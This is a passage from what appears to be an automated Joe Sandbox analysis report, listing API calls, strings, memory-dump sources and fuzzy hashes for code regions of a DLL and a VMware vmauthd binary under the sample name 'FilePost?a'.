                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6CF82D9D,00000000,?,00000001,?,?,?,6CF82E8C,00000001,FlsFree,6CFA5C60,6CFA5C68), ref: 6CF82DF9
                                                    • GetLastError.KERNEL32(?,6CF82D9D,00000000,?,00000001,?,?,?,6CF82E8C,00000001,FlsFree,6CFA5C60,6CFA5C68,00000000,?,6CF7B5AC), ref: 6CF82E03
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6CF82E2B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID: api-ms-
                                                    • API String ID: 3177248105-2084034818
                                                    • Opcode ID: fd909e06c560841b73e480d64ca754c68bbcc7f931bff29b61d83c604d2d7c80
                                                    • Instruction ID: 07395595e6f9f9e2c666e06574478cebacb448a6d7db4c5709df6cc73b097da7
                                                    • Opcode Fuzzy Hash: fd909e06c560841b73e480d64ca754c68bbcc7f931bff29b61d83c604d2d7c80
                                                    • Instruction Fuzzy Hash: C9E04F30786208B7EF801F61DC4DF893F799F11B5AF240421FA0CA88D0E7A2E5A199D8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(000F01FF,?,?,00ED15CF), ref: 00ED3209
                                                    • OpenProcessToken.ADVAPI32(00000000,?,00ED15CF), ref: 00ED3210
                                                    Strings
                                                    • bora\apps\vmauthd\authdWin32.c, xrefs: 00ED3230
                                                    • NOT_IMPLEMENTED %s:%d, xrefs: 00ED3235
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentOpenToken
                                                    • String ID: NOT_IMPLEMENTED %s:%d$bora\apps\vmauthd\authdWin32.c
                                                    • API String ID: 2256020841-3151342028
                                                    • Opcode ID: 4be7737fec3a1ec53577cb7b3e378468c024a69b1543098a64c32bc45776a2bd
                                                    • Instruction ID: 09f22f0291e3731b03ac814a51b83d87c40db0c442ef945124886819a845b0a9
                                                    • Opcode Fuzzy Hash: 4be7737fec3a1ec53577cb7b3e378468c024a69b1543098a64c32bc45776a2bd
                                                    • Instruction Fuzzy Hash: 40E09B3474020CAFC710EFB5AD4699D77F8EF04701F44106BFA01B6390DE709A058762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(?,000000FF,00000000,00000000,?,00ED38C9,Data not in UTF-8 format,?,00000003,Line is not in UTF-8. Disconnecting,?,00000000,00ED13A6), ref: 00ED278B
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000005,Data dump: %s,00000000,00000005,%s,00000003,?,000000FF,00000000,00000000,?,00ED38C9,Data not in UTF-8 format,?,00000003), ref: 00ED27AF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$_printffree
                                                    • String ID: %s$Data dump: %s
                                                    • API String ID: 457744589-4163292847
                                                    • Opcode ID: fc1472320303602c229c4ac6545966905098bb015c0d697fe864c22e1577daa4
                                                    • Instruction ID: fd68bb06306c2f92d5db672aeea9c21c278cffefad49d48061d2132ecae18507
                                                    • Opcode Fuzzy Hash: fc1472320303602c229c4ac6545966905098bb015c0d697fe864c22e1577daa4
                                                    • Instruction Fuzzy Hash: 7CD05B3018232876E62037659C47F8B3E5CCF02B71F115217FF2C753D29A522A1255E9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __EH_prolog3.LIBCMT ref: 6CF7EE8E
                                                    • UnDecorator::getSymbolName.LIBCMT ref: 6CF7EF20
                                                    • DName::operator+.LIBCMT ref: 6CF7F024
                                                    • DName::DName.LIBVCRUNTIME ref: 6CF7F0C7
                                                      • Part of subcall function 6CF7CA50: shared_ptr.LIBCMT ref: 6CF7CA6C
                                                      • Part of subcall function 6CF7CC4C: DName::DName.LIBVCRUNTIME ref: 6CF7CCAA
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Name$Name::$Decorator::getH_prolog3Name::operator+Symbolshared_ptr
                                                    • String ID:
                                                    • API String ID: 1134295639-0
                                                    • Opcode ID: 66deb29f19451824d4406ad4ea8ec46c7b3852929f978e30ea830bc54a119eac
                                                    • Instruction ID: abd6dca165e71881182019d4cd7919cd52523201a367f785e65522d8848bec0b
                                                    • Opcode Fuzzy Hash: 66deb29f19451824d4406ad4ea8ec46c7b3852929f978e30ea830bc54a119eac
                                                    • Instruction Fuzzy Hash: 83714972D162098FDF50CFA4E484BEEBBB4BB09318F14456BE520ABB51D734A945CBB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1740715915-0
                                                    • Opcode ID: def72a0cd1b808d4bffb5606597266646a020fa5456266c5ec5402a7e7bd77ae
                                                    • Instruction ID: b611ded46176536d63fc67bc7d8aa7ff474281ab91d13f42f602558eac5a729c
                                                    • Opcode Fuzzy Hash: def72a0cd1b808d4bffb5606597266646a020fa5456266c5ec5402a7e7bd77ae
                                                    • Instruction Fuzzy Hash: AC51C172506606AFEB258F54F840BAA73B4FF02308F20496FEA1557A90E731E841CBB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Similarity
                                                    • API ID: EqualOffsetTypeids
                                                    • String ID:
                                                    • API String ID: 1707706676-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 6CF88AA4: _free.LIBCMT ref: 6CF88AB2
                                                      • Part of subcall function 6CF8FFCF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6CF839A1,6CF8DB72,0000FDE9,00000000,?,?,?,6CF8D8EB,0000FDE9,00000000,?), ref: 6CF9007B
                                                    • GetLastError.KERNEL32 ref: 6CF938A4
                                                    • __dosmaperr.LIBCMT ref: 6CF938AB
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CF938EA
                                                    • __dosmaperr.LIBCMT ref: 6CF938F1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Similarity
                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                    • String ID:
                                                    • API String ID: 167067550-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6CF54D81
                                                    • TranslateMessage.USER32(?), ref: 6CF54D99
                                                    • DispatchMessageW.USER32(?), ref: 6CF54D9F
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6CF54DAB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Similarity
                                                    • API ID: Message$DispatchTranslate
                                                    • String ID:
                                                    • API String ID: 1706434739-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,00ED6DD2,?,00000002,ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d),00000000,00000000), ref: 00ED6E36
                                                    • UnloadUserProfile.USERENV(?,?,00000000,?,00ED6DD2,?,00000002,ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d),00000000,00000000), ref: 00ED6E51
                                                    • CloseHandle.KERNEL32(?,00000000,?,00ED6DD2,?,00000002,ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d),00000000,00000000), ref: 00ED6E61
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(-00000001,?,00ED6DD2,?,00000002,ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d),00000000,00000000), ref: 00ED6E6F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Similarity
                                                    • API ID: free$CloseHandleProfileUnloadUser
                                                    • String ID:
                                                    • API String ID: 3143209300-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CF9734F,?,00000001,?,00000001,?,6CF8D5C1,?,?,00000001), ref: 6CF9AD0D
                                                    • GetLastError.KERNEL32(?,6CF9734F,?,00000001,?,00000001,?,6CF8D5C1,?,?,00000001,?,00000001,?,6CF8DB0D,6CF839A1), ref: 6CF9AD19
                                                      • Part of subcall function 6CF9ACDF: CloseHandle.KERNEL32(FFFFFFFE,6CF9AD29,?,6CF9734F,?,00000001,?,00000001,?,6CF8D5C1,?,?,00000001,?,00000001), ref: 6CF9ACEF
                                                    • ___initconout.LIBCMT ref: 6CF9AD29
                                                      • Part of subcall function 6CF9ACA1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CF9ACD0,6CF9733C,00000001,?,6CF8D5C1,?,?,00000001,?), ref: 6CF9ACB4
                                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CF9734F,?,00000001,?,00000001,?,6CF8D5C1,?,?,00000001,?), ref: 6CF9AD3E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                    • String ID:
                                                    • API String ID: 2744216297-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SleepConditionVariableCS.KERNELBASE(?,6CF77E47,00000064), ref: 6CF77ECD
                                                    • LeaveCriticalSection.KERNEL32(6CFDB368,6CFD9F48,?,6CF77E47,00000064,?,6CF6203E,6CFD9F48,00000001), ref: 6CF77ED7
                                                    • WaitForSingleObjectEx.KERNEL32(6CFD9F48,00000000,?,6CF77E47,00000064,?,6CF6203E,6CFD9F48,00000001), ref: 6CF77EE8
                                                    • EnterCriticalSection.KERNEL32(6CFDB368,?,6CF77E47,00000064,?,6CF6203E,6CFD9F48,00000001), ref: 6CF77EEF
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Similarity
                                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                    • String ID:
                                                    • API String ID: 3269011525-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • _free.LIBCMT ref: 6CF89B23
                                                      • Part of subcall function 6CF8ACB9: HeapFree.KERNEL32(00000000,00000000,?,6CF899DC), ref: 6CF8ACCF
                                                      • Part of subcall function 6CF8ACB9: GetLastError.KERNEL32(?,?,6CF899DC), ref: 6CF8ACE1
                                                    • _free.LIBCMT ref: 6CF89B36
                                                    • _free.LIBCMT ref: 6CF89B47
                                                    • _free.LIBCMT ref: 6CF89B58
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 6CF5A580: ___std_exception_copy.LIBVCRUNTIME ref: 6CF5A6A2
                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CF54103
                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CF54179
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Similarity
                                                    • API ID: Ios_base_dtorstd::ios_base::_$___std_exception_copy
                                                    • String ID: OutputStreamPointer
                                                    • API String ID: 1754327082-2506108687
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 6CF530C2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Similarity
                                                    • API ID: ___std_exception_copy
                                                    • String ID: " not used$AlgorithmParametersBase: parameter "
                                                    • API String ID: 2659868963-612349224
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 6CF79C1F
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 6CF79CD3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Similarity
                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 3480331319-1018135373
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6CF7BBD8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: EncodePointer
                                                    • String ID: MOC$RCC
                                                    • API String ID: 2118026453-2084237596
                                                    • Opcode ID: d5e79ec7ade30274a506ebe52008fb5c64599ace92f0c1576d24ef62c4a5366c
                                                    • Instruction ID: 4443c9fb7ef90ed57f19626890e5709c29f54172a42f943e4cb11fa212f9f44b
                                                    • Opcode Fuzzy Hash: d5e79ec7ade30274a506ebe52008fb5c64599ace92f0c1576d24ef62c4a5366c
                                                    • Instruction Fuzzy Hash: FD417871900209AFCF26CF94ED81AEE7BB5BF09308F14859AF90476614D7359960DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Offset
                                                    • String ID: Bad dynamic_cast!
                                                    • API String ID: 1587990502-2956939130
                                                    • Opcode ID: 46ba7e4b7d58aaad0f73eb5c78b5b5112be3b8feb0e9524bb6e7b1a36f6cd597
                                                    • Instruction ID: bf6aa4c3b8cc84ff83ced0736b3ef0c0cbf2c799ea72e555f394ad897603946b
                                                    • Opcode Fuzzy Hash: 46ba7e4b7d58aaad0f73eb5c78b5b5112be3b8feb0e9524bb6e7b1a36f6cd597
                                                    • Instruction Fuzzy Hash: 92219272A142059FDF28DF6DED05A9A77B5FB85328B14461BE910A3A80DF31EB0587B0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00ED8604
                                                    • ___raise_securityfailure.LIBCMT ref: 00ED86C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                    • String ID: PY
                                                    • API String ID: 3761405300-1007129125
                                                    • Opcode ID: c6d4b726ce127cc3421e64f6b786492982cdc2fc732a09965f2caef0bee99ddf
                                                    • Instruction ID: 06cf706686768f5c36a1853d21dae1dce9ed14836bfefd7a223c34d6ab49d0f9
                                                    • Opcode Fuzzy Hash: c6d4b726ce127cc3421e64f6b786492982cdc2fc732a09965f2caef0bee99ddf
                                                    • Instruction Fuzzy Hash: C011AFB8912689DEC710CF16FDC16843BA4FB4C340B00519AF608EE3B1E77095C9EB46
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED10F7
                                                    • Warning.VMWAREBASE(?), ref: 00ED10FE
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    Strings
                                                    • Invalid arguments to '%s%s', xrefs: 00ED1120
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free
                                                    • String ID: Invalid arguments to '%s%s'
                                                    • API String ID: 2642810717-2166776113
                                                    • Opcode ID: e3994e279c6713f3b454c499ace23f79e2448cebde8779ba8af244f6df83a20d
                                                    • Instruction ID: 85a6640f798a3a549a2405ed35168962fb092e28ddb5138fef923702b8c35b28
                                                    • Opcode Fuzzy Hash: e3994e279c6713f3b454c499ace23f79e2448cebde8779ba8af244f6df83a20d
                                                    • Instruction Fuzzy Hash: E5F042763003406BD7106F65FC15FA977A9DB86714F04507FFB096B753C2626B4287A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED1077
                                                    • Warning.VMWAREBASE(?), ref: 00ED107E
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    Strings
                                                    • Invalid arguments to '%s%s', xrefs: 00ED10A0
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free
                                                    • String ID: Invalid arguments to '%s%s'
                                                    • API String ID: 2642810717-2166776113
                                                    • Opcode ID: 63dd4ec94f5c7d5acca129c158f53a54f721161db1d982f1653621d052e1492e
                                                    • Instruction ID: d98ed6eece2a30c099625b8afdd76fd3c94c17150c2373e17a3cac2c4527bbd9
                                                    • Opcode Fuzzy Hash: 63dd4ec94f5c7d5acca129c158f53a54f721161db1d982f1653621d052e1492e
                                                    • Instruction Fuzzy Hash: 6DF04276700340ABD7106F64FC11FA977A9DB86714F04507FFB056B353C222674287A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(?,000000C0,?), ref: 00ED23F2
                                                    • Warning.VMWAREBASE(00000000,?,000000C0,?), ref: 00ED23F8
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    Strings
                                                    • Error retrieving thumbprint, xrefs: 00ED242D
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning
                                                    • String ID: Error retrieving thumbprint
                                                    • API String ID: 2415109466-3028483890
                                                    • Opcode ID: 3f6899b2e74b9339cdbf0c8ae9667a60fefc779a9473070f0c1a20be876f2c7b
                                                    • Instruction ID: 784065a58f63de8e11328f242bd2f918e785394a14cb809693e3a1a527c8d4f1
                                                    • Opcode Fuzzy Hash: 3f6899b2e74b9339cdbf0c8ae9667a60fefc779a9473070f0c1a20be876f2c7b
                                                    • Instruction Fuzzy Hash: 21F06870A4130CA6EF20FB649D17F6973A8DB00704F4015EBBE097B3C2E9756A1A9686
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(?,00000100,00EDA850,?), ref: 00ED13E9
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
